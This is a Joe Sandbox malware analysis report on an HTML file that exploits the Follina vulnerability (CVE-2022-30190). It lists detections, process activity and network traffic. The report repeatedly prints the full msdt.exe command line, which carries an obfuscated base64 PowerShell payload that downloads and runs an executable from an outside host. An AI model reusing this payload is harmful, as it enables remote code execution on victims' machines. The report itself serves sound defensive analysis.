Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fbGUvJ4AdV.html

Overview

General Information

Sample Name:fbGUvJ4AdV.html
Analysis ID:696621
MD5:da3469806af3aacbbbd22a763343fff2
SHA1:6d9fd23a4d32a5963c24d39b5402eeaf2a54f093
SHA256:c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1
Tags:CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Classification

  • System is w10x64
  • chrome.exe (PID: 5708 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 6208 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 1108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: fbGUvJ4AdV.htmlVirustotal: Detection: 11%Perma Link

        Exploits

        barindex
        Source: Yara matchFile source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
        Source: fbGUvJ4AdV.htmlVirustotal: Detection: 11%
        Source: C:\Windows\System32\msdt.exeFile created: C:\Users\user\AppData\Local\Temp\msdtadminJump to behavior
        Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: classification engineClassification label: mal56.expl.winHTML@39/0@4/9
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLL
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: fbGUvJ4AdV.htmlString : entropy: 5.72, length: 262, content: "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[
        Source: fbGUvJ4AdV.htmlString : entropy: 5.27, length: 145, content: "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUo
        Source: fbGUvJ4AdV.htmlString : entropy: 5.31, length: 116, content: "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGU
        Source: fbGUvJ4AdV.htmlString : entropy: 5.44, length: 148, content: "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3A
        Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 2734
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#fbk%20it_launchmethod=contextmenu%20it_browseforfile=i$(iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'c1rpcc1quk9jzxnzic1gt1jdzsattkftzsanbxnkdcc7jhnzid0gqwrklvrzceuglw1fbujfumrfrmluaxrpt04gj1tebgxjbxbvcnqoinvste1vbi5ktewilcbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryihusc3ryaw5nieksc3ryaw5nigmsdwludcbzucxjbnrqdhigvik7jyattmftzsaibhhqiiattmftrvnwqwnlietjecatugfzc1rocnu7icrzwto6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9hlnbvbwyuy2f0l2lwcmlnay5leguilcikzw5wokfquerbvefcq2jodhiuzxhliiwwldapo1nuqvj0lvnmrwvwkdmpo1j1bkrsbdmylkvyzsb6axbmbgrylmrsbcxsb3v0zvrozunhbgwgiirfbny6qvbqrefuqvxdymh0ci5leguio3nub3atufjpq0vzcyatzm9sq0uglu5hbwugj3nkawfnbmhvc3qn'+[char]34+'))'))))ti/../../../../../../../../../../.msi%20%22
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path Interception1
        Process Injection
        2
        Masquerading
        OS Credential Dumping1
        Application Window Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Scripting
        Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Data Encoding
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Scripting
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits1
        Ingress Tool Transfer
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        fbGUvJ4AdV.html12%ReversingLabsScript.Exploit.Heuristic
        fbGUvJ4AdV.html12%VirustotalBrowse
        fbGUvJ4AdV.html0%MetadefenderBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        accounts.google.com
        216.58.215.237
        truefalse
          high
          www.google.com
          172.217.168.36
          truefalse
            high
            clients.l.google.com
            172.217.168.78
            truefalse
              high
              clients2.google.com
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                  high
                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    216.58.215.237
                    accounts.google.comUnited States
                    15169GOOGLEUSfalse
                    172.217.168.78
                    clients.l.google.comUnited States
                    15169GOOGLEUSfalse
                    172.217.168.36
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    IP
                    192.168.2.1
                    192.168.2.4
                    192.168.2.5
                    192.168.2.23
                    127.0.0.1
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:696621
                    Start date and time:2022-09-02 15:27:50 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:fbGUvJ4AdV.html
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:25
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • GSI enabled (Javascript)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal56.expl.winHTML@39/0@4/9
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .html
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
                    • Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
